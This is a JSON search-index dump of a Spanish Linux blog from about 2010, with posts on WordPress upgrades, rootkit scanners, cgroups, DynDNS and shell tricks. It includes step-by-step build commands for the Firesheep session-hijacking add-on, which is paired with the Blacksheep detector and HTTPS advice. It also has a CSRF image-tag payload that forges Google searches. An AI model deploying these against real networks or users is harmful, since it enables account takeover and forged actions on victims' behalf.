IP que queramos utilizando el\nargumento \u003ccode\u003e--ip_server_name\u003c/code\u003e para especificar un servidor controlado por\nnosotros y que devuelva la IP que queramos.\u003c/p\u003e","title":"Asignar la IP que queramos a un dominio de DynDNS"},{"content":" Copia de respaldo de la base de datos. Entre el flag -u y el nombre de usuario no debe haber ningún espacio. Ojo, se bloquearán las tablas hasta que termine. Y otro ojo, no es muy recomendable escribir la contraseña directamente en la línea de comandos. Si sólo ponemos el flag `-p`, se nos pedirá la contraseña para el usuario proporcionado. $ /usr/bin/mysqldump -uuser -p --all-databases | gzip \u0026gt; mysql-$(date +%F).tgz Copia de respaldo de los archivos. Tanto del directorio `wp-uploads` como del directorio `wordpress`. $ tar -cvzf wordpress-$(date +%F).tgz /usr/share/wordpress $ tar -cvzf wp-uploads-$(date +%F).tgz /var/www/wp-uploads Desactivamos todos los plugins desde el panel de control. Eliminamos los subdirectorios wp-admin y wp-includes. $ cd /usr/share/wordpress $ sudo rm -fr wp-admin wp-includes Instalamos la última versión. $ wget -NP /tmp http://wordpress.org/latest.zip $ sudo unzip /tmp/latest.zip -d /usr/share # yes to [A]ll Comprobamos si se debe actualizar la base de datos de WordPress. En principio, basta ir al panel de administración y ahí nos aparecerá un mensaje diciéndonos que es necesario actualizar la base de datos y que visitemos la página `/wp-admin/upgrade.php` para realizar dicha actualización. En una sola línea:\n$ /usr/bin/mysqldump -uuser -p --all-databases | gzip \u0026gt; mysql-$(date +%F).tgz \u0026amp;\u0026amp; tar -cvzf wordpress-$(date +%F).tgz /usr/share/wordpress \u0026amp;\u0026amp; tar -cvzf wp-uploads-$(date +%F).tgz /var/www/wp-uploads \u0026amp;\u0026amp; cd /usr/share/wordpress \u0026amp;\u0026amp; sudo rm -fr wp-admin wp-includes \u0026amp;\u0026amp; wget -NP /tmp http://wordpress.org/latest.zip \u0026amp;\u0026amp; sudo unzip /tmp/latest.zip -d /usr/share más info: Actualizando WordPress Actualizado el 31 de diciembre de 2010 5 segundos más para actualizar las traducciones, debemos especificar el número de versión y el idioma. Por ejemplo:\n$ wget -NP /tmp http://es.wordpress.org/wordpress-3.0.4-es_ES.zip $ sudo unzip /tmp/wordpress-3.0.4-es_ES.zip -d /usr/share # yes to [A]ll ","permalink":"http://karpoke.ignaciocano.com/2010/12/30/la-infame-actualizacion-de-wordpress-en-15-segundos/","summary":"\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eCopia de respaldo de la base de datos\u003c/strong\u003e. Entre el flag \u003ccode\u003e-u\u003c/code\u003e y el\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003enombre de usuario no debe haber ningún espacio. Ojo, se bloquearán\nlas tablas hasta que termine. Y otro ojo, no es muy recomendable\nescribir la contraseña directamente en la línea de comandos. Si sólo\nponemos el flag `-p`, se nos pedirá la contraseña para el usuario\nproporcionado.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    $ /usr/bin/mysqldump -uuser -p --all-databases | gzip \u0026gt; mysql-$(date +%F).tgz\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"2\"\u003e\n\u003cli\u003e\u003cstrong\u003eCopia de respaldo de los archivos\u003c/strong\u003e. Tanto del directorio\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e`wp-uploads` como del directorio `wordpress`.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    $ tar -cvzf wordpress-$(date +%F).tgz /usr/share/wordpress\n$ tar -cvzf wp-uploads-$(date +%F).tgz /var/www/wp-uploads\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"3\"\u003e\n\u003cli\u003e\u003cstrong\u003eDesactivamos todos los \u003cem\u003eplugins\u003c/em\u003e\u003c/strong\u003e desde el panel de control.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEliminamos los subdirectorios\u003c/strong\u003e \u003ccode\u003ewp-admin\u003c/code\u003e y \u003ccode\u003ewp-includes\u003c/code\u003e.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    $ cd /usr/share/wordpress\n$ sudo rm -fr wp-admin wp-includes\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"5\"\u003e\n\u003cli\u003e\u003cstrong\u003eInstalamos\u003c/strong\u003e la última versión.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    $ wget -NP /tmp http://wordpress.org/latest.zip\n$ sudo unzip /tmp/latest.zip -d /usr/share # yes to [A]ll\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"6\"\u003e\n\u003cli\u003eComprobamos si se debe \u003cstrong\u003eactualizar la base de datos de WordPress\u003c/strong\u003e.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eEn principio, basta ir al panel de administración y ahí nos\naparecerá un mensaje diciéndonos que es necesario actualizar la base\nde datos y que visitemos la página `/wp-admin/upgrade.php` para\nrealizar dicha actualización.\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn una sola línea:\u003c/p\u003e","title":"La infame actualización de WordPress en 15 segundos"},{"content":"Firesheep es un complemento para Firefox que permite robar la identidad de los usuarios de diferentes redes sociales (Dropbox, Facebook, Flickr, Google, Twitter, Windows Live, Wordpress\u0026hellip;) que se encuentren conectados a la misma red que el ladrón. La mejor manera de evitarlo es cifrar el tráfico, por ejemplo utilizando HTTPS-everywhere, otro complemento para Firefox.\nPoco después surgió Blacksheep, otro complemento más, que nos alerta si un usuario de la misma red está utilizando FireSheep.\nTanto Firesheep como Blacksheep no están disponibles para Firefox en GNU/Linux desde el menú de complementos de Firefox, pero podemos instalarlo si recompilamos la extensión. El ejemplo en el enlace anterior está pensado para CentOS, pero para Ubuntu Maverick Merkat es prácticamente igual:\nBlacksheep para Firefox en Ubuntu Maverick Meerkat Se requiere:\n$ sudo aptitude install autoconf libpcap-dev xulrunner-dev libboost-dev libhal-dev En Ubuntu no habrá problemas con la versión de autoconf, ya que es superior a la 2.61:\n$ autoconf -V autoconf (GNU Autoconf) 2.67 Ni con la de libpcap-dev, ya que viene la 1.1.1-2:\n$ aptitude show libpcap-dev Paquete: libpcap-dev Estado: instalado Instalado automáticamente: no Versión: 1.1.1-2 Suponemos que vamos a trabajar en el directorio de usuario. Tenemos que compilar el back-end de Firesheep. Lo primero será bajarnos el código de Firesheep:\n$ git clone git://github.com/mickflemm/firesheep.git Y ahora lo compilamos:\n$ cd firesheep $ git submodule update --init $ ./autogen.sh --with-xulrunner-sdk=/usr/lib/xulrunner-devel-1.9.2.13/ $ make Vamos a comprobar que el backend funciona correctamente:\n$ cd xpi/platform/Linux_x86-gcc3/ $ sudo ./firesheep-backend --fix-permissions $ ./firesheep-backend --list-interfaces Nos devuelve algo como:\n{\u0026#34;eth0\u0026#34;:{\u0026#34;name\u0026#34;:\u0026#34;Networking Interface\u0026#34;,\u0026#34;type\u0026#34;:\u0026#34;ethernet\u0026#34;}, \u0026#34;eth2\u0026#34;:{\u0026#34;name\u0026#34;:\u0026#34;WLAN Interface\u0026#34;,\u0026#34;type\u0026#34;:\u0026#34;ethernet\u0026#34;}, \u0026#34;lo\u0026#34;:{\u0026#34;name\u0026#34;:\u0026#34;Loopback device Interface\u0026#34;,\u0026#34;type\u0026#34;:\u0026#34;ethernet\u0026#34;}} Para comprobar que podemos capturar paquetes ejecutamos:\n$ ./firesheep-backend eth2 \u0026#34;tcp port 80\u0026#34; Abrimos una página de internet, o en otra consola ejecutamos algo como:\n$ wget http://www.zscaler.com/ Si todo va bien, nos empezará a devolver cosas como:\n{\u0026#34;from\u0026#34;:\u0026#34;192.168.0.32:49670\u0026#34;, \u0026#34;to\u0026#34;:\u0026#34;72.249.144.174:80\u0026#34;, \u0026#34;method\u0026#34;:\u0026#34;GET\u0026#34;, \u0026#34;path\u0026#34;:\u0026#34;/\u0026#34;, \u0026#34;query\u0026#34;:\u0026#34;\u0026#34;, \u0026#34;host\u0026#34;:\u0026#34;www.zscaler.com\u0026#34;, \u0026#34;cookies\u0026#34;:\u0026#34;\u0026#34;, \u0026#34;userAgent\u0026#34;:\u0026#34;Wget/1.12 (linux-gnu)\u0026#34;} Ahora vamos a incluir el back-end en el complemento BlackSheep:\ncd ~ wget http://www.zscaler.com/research/plugins/firefox/blacksheep/blacksheep-latest.xpi mkdir blacksheep unzip blacksheep-latest.xpi -d blacksheep/ cd blacksheep cp -r ../firesheep/xpi/platform/* platform/ Del archivo install.rdf, borraremos las líneas:\nDarwin_x86-gcc3 WINNT_x86-msvc em:updateURL=\u0026#34;http://www.zscaler.com/research/plugins/firefox/blacksheep/update.rdf\u0026#34; La última línea es para evitar las actualizaciones automáticas.\nAhora ya podemos crear el .xpi:\n$ zip blacksheep-latest-linux.xpi -r * Lo instalamos y reiniciamos Firefox. Nos pedirá permisos de administrador para poder ejecutar el complemento. Introducimos la contrseña y listos. Como corolario, he subido el complemento al directorio público.\nFiresheep para Firefox en Ubuntu Maverick Meerkat Dado que ya nos hemos bajado el código de Firesheep y lo hemos compilado, tenemos disponible el .xpi en el directorio ~/firesheep/build/firesheep.xpi. También se encuentra disponible en el directorio público.\nDespués de instalarlo, será necesario darle permisos manualmente para que detecte las interfaces:\n$ cd ~/.mozilla/firefox/ygqde9s7.default/extensions/firesheep@codebutler.com/platform/Linux_x86-gcc3/ $ sudo ./firesheep-backend --fix-permissions El menú de Firesheep es accesible a través del panel lateral: Ver / Panel lateral / Firesheep o Ctrl+Shft+s.\n","permalink":"http://karpoke.ignaciocano.com/2010/12/18/robando-la-identidad-del-vecino/","summary":"\u003cp\u003e\u003ca href=\"http://codebutler.com/firesheep\"\u003eFiresheep\u003c/a\u003e es un complemento para Firefox que permite \u003ca href=\"http://alt1040.com/2010/10/firesheep-facebook-google-twitter-windows-live-wordpress-google\"\u003erobar la\nidentidad\u003c/a\u003e de los usuarios de diferentes redes sociales (\u003ca href=\"/2010/10/31/como-publicar-directorios-en-ubuntu-one-y-dropbox/\"\u003eDropbox\u003c/a\u003e,\n\u003ca href=\"/2010/10/23/senoras-que-se-ponen-un-nombre-falso-en-facebook-pero-usan-su-direccion-de-correo-personal/\"\u003eFacebook\u003c/a\u003e, Flickr, \u003ca href=\"/2010/12/13/csrf-en-las-busquedas-de-google/\"\u003eGoogle\u003c/a\u003e, Twitter, Windows Live,\n\u003ca href=\"/2010/12/30/la-infame-actualizacion-de-wordpress-en-15-segundos/\"\u003eWordpress\u003c/a\u003e\u0026hellip;) que se encuentren conectados a la misma red que el\nladrón. La mejor manera de \u003ca href=\"http://alt1040.com/2010/11/como-protegerse-de-firesheep\"\u003eevitarlo\u003c/a\u003e es cifrar el tráfico, por\nejemplo utilizando \u003ca href=\"http://www.eff.org/https-everywhere\"\u003eHTTPS-everywhere\u003c/a\u003e, otro complemento para Firefox.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"HTTPS Everywhere prefs\" loading=\"lazy\" src=\"/images/https-everywhere-prefs-300x110.png\"\u003e\u003c/p\u003e\n\u003cp\u003ePoco después surgió \u003ca href=\"http://www.zscaler.com/blacksheep.html\"\u003eBlacksheep\u003c/a\u003e, otro complemento más, que nos alerta\nsi un usuario de la misma red está utilizando FireSheep.\u003c/p\u003e","title":"Robando la identidad del vecino"},{"content":"Tres herramientas muy útiles: rkhunter, chkrootkit y unhide.\nrkhunter Busca rootkits, puertas traseras y exploits. Al instalarlo, se programa un escaneo diario, pero cuando instalamos las actualizaciones de algunos programas, las firmas de rkhunter quedan obsoletas, por lo que empieza a mandar avisos.\nWarning: The file properties have changed: File: /usr/bin/md5sum Current inode: 1093680 Stored inode: 475456 Current file modification time: 1285094009 (21-sep-2010 20:33:29) Stored file modification time : 1267759792 (05-mar-2010 04:29:52) Podemos actualizar las firmas de rkhunter ejecutando:\n$ sudo rkhunter --propupd El motivo de que no se actualicen las firmas automáticamente es que es responsabilidad del usuario asegurarse de que los ficheros del sistema son genuinos y provienen de una fuente fiable. Cuando ejecutamos el comando anterior, le estamos diciendo a rkhunter que acepte las firmas de los nuevos ficheros como válidas y a éstos como genuinos.\nDirectorios o ficheros ocultos Si usamos Ubuntu, es posible que nos llegue un correo de aviso de rkhunter diciendo que ha encontrado una serie de directorios ocultos, pero que son legítimos en Ubuntu. Por ejemplo:\nWarning: Hidden directory found: /dev/.udev Para solucionarlo, editamos el fichero de configuración /etc/rkhunter.conf y descomentamos, o añadimos, las líneas referentes a dichos directorios:\nALLOWHIDDENDIR=/dev/.udev Si en lugar de un directorio es un fichero, la directiva a utilizar es ALLOWHIDDENFILE.\nDespués de introducir los cambios, actualizamos rkhunter:\n$ sudo rkhunter --propupd Actualización a 17 de marzo de 2013 La versión de los repositorios, la 1.3.8, tiene un pequeño fallo por el cual los enlaces simbólicos no pueden ser ignorados mediante la directiva ALLOWHIDDENFILES, por lo que aparece un mensaje como el siguiente:\nWarning: Hidden file found: /dev/.initramfs: symbolic link to `/run/initramf`s En la versión 1.4.0 ya está corregido, aunque aún no se encuentra en los repositorios en Ubuntu 12.04.2. Una alternativa es [parchear el script][parchear el script].\nEditamos el script en Python y vamos a la línea 846:\n$ sudo vim +846 /usr/bin/rkhunter Justo a continuación, deberemos comprobar si el fichero en un enlace simbólico, por lo que el código deberá queda así:\nelif [ -d \u0026#34;${FNAME}\u0026#34; ]; then # # For the ALLOWHIDDENFILE option we need to allow # a hidden symbolic link to a directory. # test \u0026#34;${OPT_NAME}\u0026#34; = \u0026#34;ALLOWHIDDENFILE\u0026#34; -a -h \u0026#34;${FNAME}\u0026#34; \u0026amp;\u0026amp; continue case \u0026#34;${OPT_NAME}\u0026#34; in Ahora ya podemos añadir el fichero en el archivo de configuración /etc/rkhunter.conf:\nALLOWHIDDENFILE=\u0026#34;/dev/.initramfs\u0026#34; Y actualizar la base de datos de firmas:\n$ sudo rkhunter --propupd Si usamos algún programa que comprueba la integridad de los ficheros, como por ejemplo tiger, es posible que recibamos una aviso como el siguiente:\nNEW: --FAIL-- [lin005f] Installed file \u0026#39;/usr/bin/rkhunter\u0026#39; checksum differs from installed package \u0026#39;rkhunter\u0026#39;. Comandos que cambian a scripts Si se añade un script al PATH del sistema o sustituye a algún comando, rkhunter también nos lo notificará. Por ejemplo:\nWarning: The command \u0026#39;/sbin/chkconfig\u0026#39; has been replaced by a script: /sbin/chkconfig: a /usr/bin/perl script text executable Si estamos seguros de que el cambio es legítimos, podemos añadir la siguiente línea en /etc/rkhunter.conf:\nSCRIPTWHITELIST=/sbin/chkconfig Después de introducir los cambios, actualizamos rkhunter:\n$ sudo rkhunter --propupd rkhunter y reiserfs Si nuestro sistema de ficheros es reiserfs, o xfs, y hemos instalado el paquete e2fsprogs, el cual contiene herramientas para trabajar con sistemas de ficheros ext2, ext3 y ext4, es posible que recibamos un aviso que se queja de lsattr:\nWarning: Checking for prerequisites [ Warning ] No output from the \u0026#39;lsattr\u0026#39; command - all file immutable-bit checks will be skipped. La solución pasa por editar el fichero /etc/rkhunter.conf, buscar la directiva DISABLE_TESTS y añadir el parámetro immutable al final.\nA continuación, actualizamos rkhunter:\n$ sudo rkhunter --propupd chkrootkit \u0026hellip;detecta rootkits. Por defecto, sólo se ejecuta cuando lo lanzamos nosotros. Para que se realice un escaneo diario, modificaremos el fichero /etc/chkrootkit.conf:\nRUN_DAILY=\u0026#34;true\u0026#34; Actualizado el 2 de noviembre de 2013 En los reportes de chkrootkit es posible que nos llegue el aviso de que el archivo /sbin/init está infectado:\nWarning: /sbin/init INFECTED Parece ser un fallo en chkrootkit, ya que para determinar si el archivo /sbin/init está infectado, lo que hace es buscar la cadena \u0026ldquo;HOME\u0026rdquo; el el fichero, mediante el comando strings:\n$ strings /sbin/init | egrep HOME XDG_CACHE_HOME XDG_CONFIG_HOME El fallo está presente al menos en la versión 0.49, que es la que hay disponible en los repositorios de Ubuntu Saucy Salamander. Una manera de evitar el aviso es buscar el siguiente trozo de código, alrededor de la línea 1005:\nif [ ${SYSTEM} != \u0026#34;HP-UX\u0026#34; ] \u0026amp;\u0026amp; ( ${strings} ${ROOTDIR}sbin/init | ${egrep} HOME || cat ${ROOTDIR}/proc/1/maps | ${egrep} \u0026#34;init.\u0026#34; ) \u0026gt;/dev/null 2\u0026gt;\u0026amp;1 Y sustituirlo por:\nif [ ${SYSTEM} != \u0026#34;HP-UX\u0026#34; ] \u0026amp;\u0026amp; ( cat ${ROOTDIR}/proc/1/maps | ${egrep} \u0026#34;init.\u0026#34; ) \u0026gt;/dev/null 2\u0026gt;\u0026amp;1 unhide Detecta procesos ocultos y puertas traseras, basándose en la información obtenida de /proc, /bin/ps y syscalls, y de los puertos activos que no aparecen según /bin/netstat.\nEn la versión unhide-20100201-1, para el listado de procesos, comprueba los resultados de /bin/ps, ejecutándolo de las siguientes maneras:\n// we are looking only for real process not thread and only one by one #define COMMAND \u0026#34;ps --no-header -p %i o pid\u0026#34; // we ara looking for session ID one by one #define SESSION \u0026#34;ps --no-header -s %i o sess\u0026#34; // We are looking for group ID one by one // but ps can’t select by pgid #define PGID \u0026#34;ps --no-header -eL o pgid\u0026#34; // We are looking for all processes even threads #define THREADS \u0026#34;ps --no-header -eL o lwp\u0026#34; // for sysinfo scanning, fall back to old command, as --no-header seems to create // an extra process #define SYS_COMMAND \u0026#34;ps -eL o lwp\u0026#34; En escaneo de puertos utiliza los resultados de /bin/netstat:\n// Linux char tcpcommand[]= \u0026#34;netstat -tan | sed -e \u0026#39;/[\\\\.:][0-9]/!d\u0026#39; -e \u0026#39;s/.*[\\\\.:]\\\\([0-9]*\\\\) .*[\\\\.:].*/\\\\1/\u0026#39;\u0026#34; ; char udpcommand[]= \u0026#34;netstat -uan | sed -e \u0026#39;/[\\\\.:][0-9]/!d\u0026#39; -e \u0026#39;s/.*[\\\\.:]\\\\([0-9]*\\\\) .*[\\\\.:].*/\\\\1/\u0026#39;\u0026#34; ; Podemos lograr que se ejecute periódicamente añadiendo al crontab algo como:\n0 8 * * * unhide-linux26 proc 2\u0026gt;\u0026amp;1 | mail -s \u0026#34;Daily unhide-linux26 proc Scan\u0026#34; user@example.com 30 8 * * * unhide-linux26 sys 2\u0026gt;\u0026amp;1 | mail -s \u0026#34;Daily unhide-linux26 sys Scan\u0026#34; user@example.com 0 9 * * * unhide-linux26 brute 2\u0026gt;\u0026amp;1 | mail -s \u0026#34;Daily unhide-linux26 brute Scan\u0026#34; user@example.com 30 9 * * * unhide-tcp 2\u0026gt;\u0026amp;1 | mail -s \u0026#34;Daily unhide-tcp Scan\u0026#34; user@example.com ","permalink":"http://karpoke.ignaciocano.com/2010/12/17/buscando-rootkits-y-troyanos/","summary":"\u003cp\u003eTres herramientas muy útiles: \u003ccode\u003erkhunter\u003c/code\u003e, \u003ccode\u003echkrootkit\u003c/code\u003e y \u003ccode\u003eunhide\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"rkhunter\"\u003erkhunter\u003c/h2\u003e\n\u003cp\u003eBusca \u003cem\u003erootkits\u003c/em\u003e, puertas traseras y \u003cem\u003eexploits\u003c/em\u003e. Al instalarlo, se\nprograma un escaneo diario, pero cuando instalamos las actualizaciones\nde algunos programas, \u003ca href=\"http://www.mail-archive.com/rkhunter-users@lists.sourceforge.net/msg01966.html\"\u003elas firmas de \u003ccode\u003erkhunter\u003c/code\u003e quedan obsoletas\u003c/a\u003e, por\nlo que empieza a mandar avisos.\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eWarning: The file properties have changed:\n         File: /usr/bin/md5sum\n         Current inode: 1093680    Stored inode: 475456\n         Current file modification time: 1285094009 (21-sep-2010 20:33:29)\n         Stored file modification time : 1267759792 (05-mar-2010 04:29:52)\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePodemos actualizar las firmas de \u003ccode\u003erkhunter\u003c/code\u003e ejecutando:\u003c/p\u003e","title":"Buscando rootkits y troyanos"},{"content":"El parche de 200 líneas para el kernel, o su versión en espacio de usuario, mejora el rendimiento interactivo agrupando los procesos por tty. La mejora sólo será notable si tenemos varios procesos asociados a un terminal que tengan un consumo importante de CPU, ya que la potencia de ésta no se repartirá entre el número de procesos sino entre el número de grupos de procesos. De ahí que sea una mejora interactiva, el ordenador no irá más rápido, pero sí tendremos la sensación de que responde más rápido. Este parche requiere un kernel superior al 2.6.36 con soporte a grupos de tareas.\nPara saber los procesos que están asociados a una terminal podemos ejecutar:\n$ ps -e | grep -v ? (Los procesos que tienen un interrogante no están asociados a ninguna terminal.)\nPara aplicar el parche, en Ubuntu:\neditamos el archivo /etc/rc.local y añadimos, antes del exit 0: $ mkdir -p /dev/cgroup/cpu $ mount -t cgroup cgroup /dev/cgroup/cpu -o cpu $ mkdir -m 0777 /dev/cgroup/cpu/user $ echo \u0026#34;/usr/local/sbin/cgroup_clean\u0026#34; \u0026gt; /dev/cgroup/cpu/release_agent lo hacemos ejecutable, por si acaso no lo estuviera ya: $ sudo chmod +x /etc/rc.local editamos nuestro ~/.bashrc y añadimos: if [ \u0026#34;$PS1\u0026#34; ]; then mkdir -p -m 0700 /dev/cgroup/cpu/user/$$ echo $$ \u0026gt; /dev/cgroup/cpu/user/$$/tasks echo \u0026#34;1\u0026#34; \u0026gt; /dev/cgroup/cpu/user/$$/notify_on_release fi creamos el archivo /usr/local/sbin/cgroup_clean y añadimos: #!/bin/sh if [ \u0026#34;$*\u0026#34; != \u0026#34;/user\u0026#34; ]; then rmdir /dev/cgroup/cpu/$* fi le damos permisos de ejecución: $ sudo chmod +x /usr/local/sbin/cgroup_clean y, por último, ejecutamos el script: $ sudo /etc/rc.local o reiciniamos: $ sudo reboot ","permalink":"http://karpoke.ignaciocano.com/2010/12/16/mejora-del-rendimiento-interactivo-agrupando-tareas-por-terminal/","summary":"\u003cp\u003eEl \u003ca href=\"http://lkml.org/lkml/2010/10/19/123\"\u003eparche de 200 líneas\u003c/a\u003e para el kernel, o su versión en \u003ca href=\"http://usemoslinux.blogspot.com/2010/11/foto-resumen-tras-haber-realizado-el.html\"\u003eespacio de\nusuario\u003c/a\u003e, \u003ca href=\"http://ubuntulife.wordpress.com/2010/11/20/el-parche-milagro-de-linux-de-200-lineas-implementado-en-4-lineas-de-bash/#comment-43848\"\u003emejora el rendimiento interactivo\u003c/a\u003e agrupando los procesos\npor \u003ccode\u003etty\u003c/code\u003e. La mejora sólo será notable si tenemos varios procesos\nasociados a un terminal que tengan un consumo importante de CPU, ya que\nla potencia de ésta no se repartirá entre el número de procesos sino\nentre el número de grupos de procesos. De ahí que sea una mejora\n\u003cem\u003einteractiva\u003c/em\u003e, el ordenador no irá más rápido, pero sí tendremos la\nsensación de que responde más rápido. Este parche requiere un kernel\nsuperior al 2.6.36 con soporte a grupos de tareas.\u003c/p\u003e","title":"Mejora del rendimiento interactivo agrupando tareas por terminal"},{"content":" No se ha encontrado ningún resultado\nSi ahora mismo tienes una sesión de Google iniciada, puedes ir al histórico de búsquedas de Google y verás que aparece una búsqueda que no has realizado\u0026hellip; conscientemente.\nEl truco, un ataque CSRF comentado por Jeremiah Grossman, consiste en añadir en el código HTML de la página una imagen cuyo src sea la URL de la búsqueda que queramos que realice el que visite la página. Por ejemplo:\n\u0026lt;img src=\u0026quot;http://www.google.es/search?q=%22terminus.ignaciocano.com%22\u0026quot;\u0026gt;\n`\u0026lt;img src=\u0026#34;http://www.google.es/search?q=%22terminus.ignaciocano.com%22\u0026#34;\u0026gt;` ","permalink":"http://karpoke.ignaciocano.com/2010/12/13/csrf-en-las-busquedas-de-google/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNo se ha encontrado ningún resultado\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"No injury is acceptable\" loading=\"lazy\" src=\"/images/no-injury-is-acceptable-300x233.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eSi ahora mismo tienes una sesión de Google iniciada, puedes ir al\n\u003ca href=\"http://google.com/history\"\u003ehistórico de búsquedas de Google\u003c/a\u003e y verás que aparece una búsqueda\nque no has realizado\u0026hellip; conscientemente.\u003c/p\u003e\n\u003cp\u003eEl truco, un ataque \u003ca href=\"http://en.wikipedia.org/wiki/Cross-site_request_forgery\"\u003eCSRF\u003c/a\u003e comentado por \u003ca href=\"http://jeremiahgrossman.blogspot.com/2010/12/spoofing-google-search-history-with.html\"\u003eJeremiah Grossman\u003c/a\u003e,\nconsiste en añadir en el código HTML de la página una imagen cuyo \u003ccode\u003esrc\u003c/code\u003e\nsea la URL de la búsqueda que queramos que realice el que visite la\npágina. Por ejemplo:\u003c/p\u003e","title":"CSRF en las búsquedas de Google"},{"content":"Dyndns no hace mucho que cambió su política de servicios, reduciendo el número de direcciones gratuitas que se podían gestionar con una cuenta de usuario de 5 a 2, y reduciendo también el número de dominios entre los que escoger.\nSin embargo, si antes de que cambiaran la política ya teníamos más de 2 direcciones o eran de dominios que ya no están disponibles, podremos seguir conservándolos mientras sigan siendo utilizados, es decir, mientras se siga actualizando regularmente la IP a la que deben apuntar, como mínimo una vez al mes. Si actualmente usamos la dirección no hay problema, ya se encarga el router o el cliente de escritorio de actualizarla. Pero si tenemos alguna dirección que no estamos utilizando pero que queremos conservar y tenemos más de 2 direcciones en nuestra cuenta, corremos el peligro de que se nos pase y la perdamos.\nUna forma de evitar esto es utilizar el comando inadyn, que permite actualizar la IP de la dirección que especifiquemos. Para poder incluirlo en el cron, lo mejor será crear un pequeño script, de tal manera que nuestra contraseña no quede registrada en ningún fichero de log (como sí quedaría si pusíeramos el comando directamente en el crontab):\n/usr/sbin/inadyn -u user -p pass --iterations 1 --dyndns_system custom@dyndns.org -a terminus.ignaciocano.com -a anacreonte.homelinux.com Podemos añadir tantos subdominios como queramos, o tengamos, precedidos del argumento -a.\n","permalink":"http://karpoke.ignaciocano.com/2010/12/11/dyndns-e-inadyn/","summary":"\u003cp\u003e\u003ca href=\"http://free.domain.name/\"\u003eDyndns\u003c/a\u003e no hace mucho que cambió su política de servicios, reduciendo\nel número de direcciones gratuitas que se podían gestionar con una\ncuenta de usuario de 5 a 2, y reduciendo también el número de dominios\nentre los que escoger.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Karpoke\" loading=\"lazy\" src=\"/extra/favicon.ico\"\u003e\u003c/p\u003e\n\u003cp\u003eSin embargo, si antes de que cambiaran la política ya teníamos más de 2\ndirecciones o eran de dominios que ya no están disponibles, podremos\nseguir conservándolos mientras sigan siendo utilizados, es decir,\nmientras se siga actualizando regularmente la IP a la que deben apuntar,\ncomo mínimo una vez al mes. Si actualmente usamos la dirección no hay\nproblema, ya se encarga el router o el cliente de escritorio de\nactualizarla. Pero si tenemos alguna dirección que no estamos utilizando\npero que queremos conservar y tenemos más de 2 direcciones en nuestra\ncuenta, corremos el peligro de que se nos pase y la perdamos.\u003c/p\u003e","title":"Dyndns e inadyn"},{"content":"Si tenemos una imagen y queremos crear un póster impreso (y montado a base de folios) por nosotros mismos podemos utilizar un servicio como Block posters. También podemos utilizar los comandos convert y pdfposter para conseguir lo mismo.\nPrimero creamos un PDF a partir de la imagen, en este caso del mapa del software libre:\n$ convert mapa-del-software-libre.png mapa-del-software-libre.pdf Ahora ya podemos crear el póster:\n$ pdfposter -mA4 -pA0 mapa-del-software-libre.pdf poster-del-mapa-del-software-libre.pdf El argumento -m indica el tamaño del medio en que se va a imprimir, en este caso el tamaño es A4. El argumento -p indica el tamaño deseado, en este caso, A0. Hay otras combinaciones comentadas en la página del manual de pdfposter.\nLa imagen, el PDF y el póster que he utilizado de ejemplo se pueden encontrar en mi directorio público de Ubuntu One.\n","permalink":"http://karpoke.ignaciocano.com/2010/12/11/poster-casero/","summary":"\u003cp\u003eSi tenemos una imagen y queremos crear un póster impreso (y montado a\nbase de folios) por nosotros mismos podemos utilizar un servicio como\n\u003ca href=\"http://www.hogargeek.com/posters-de-hagalo-usted-mismo-con-block-posters/\"\u003eBlock posters\u003c/a\u003e. También podemos utilizar los comandos \u003ccode\u003econvert\u003c/code\u003e y\n\u003ccode\u003epdfposter\u003c/code\u003e para conseguir lo mismo.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Mapa del Software Libre - 03.02.2010 - René Mérou\" loading=\"lazy\" src=\"/images/Mapa-del-Software-Libre-03.02.2010-Ren%C3%A9-M%C3%A9rou-300x211.png\"\u003e\u003c/p\u003e\n\u003cp\u003ePrimero creamos un PDF a partir de la imagen, en este caso del \u003ca href=\"http://www.es.gnu.org/~reneme/fsmap/\"\u003emapa del\nsoftware libre\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ convert mapa-del-software-libre.png mapa-del-software-libre.pdf\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eAhora ya podemos crear el póster:\u003c/p\u003e","title":"Póster casero"},{"content":"\nEn algunos lenguajes, intercambiar el valor de la variable a por el de la variable b implica, explícitamente, utilizar una variable temporal:\nt = a; a = b; b = t; En Python:\na, b = b, a Pero esperen, aún hay más:\na, b, c, d = d, c, b, a Actualizado el 31 de julio de 2011 En Bash:\n$ read a b c \u0026lt;\u0026lt;\u0026lt; $(echo $c $b $a) Otra manera:\n$ read a b c \u0026lt;\u0026lt;(echo $c $b $a) Actualizado el 23 de junio de 2016 Si los valores son numéricos, podemos recurrir a sumas y restas:\nIn [1]: a, b = 3, 5 In [2]: a = a + b In [3]: b = a - b In [4]: a = a - b In [5]: a, b Out[5]: (5, 3) O multiplicaciones y divisiones:\nIn [1]: a, b = 3.2, 5.7 In [2]: a = a * 